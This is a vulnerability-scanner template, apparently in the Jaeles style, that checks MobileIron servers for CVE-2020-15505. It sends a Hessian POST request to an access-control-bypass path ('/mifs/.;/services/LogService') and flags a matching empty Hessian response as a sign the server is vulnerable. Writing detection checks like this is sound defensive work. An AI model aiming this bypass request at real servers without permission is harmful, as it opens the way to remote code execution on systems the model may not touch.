id: CVE-2020-15505 info: name: MobileIron RCE risk: Potential params: - root: '{{.BaseURL}}' - desr: 'YwIASAAEdGVzdE0=' variables: - endpoint: | /mifs/.;/services/LogService requests: - method: POST redirect: false url: >- {{.root}}/{{.endpoint}} headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Content-Type: x-application/hessian - Referer: '{{.BaseURL}}' body: | {{ .desr | b64dec }} detections: - >- StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0 references: - https://www.cvebase.com/cve/2020/15505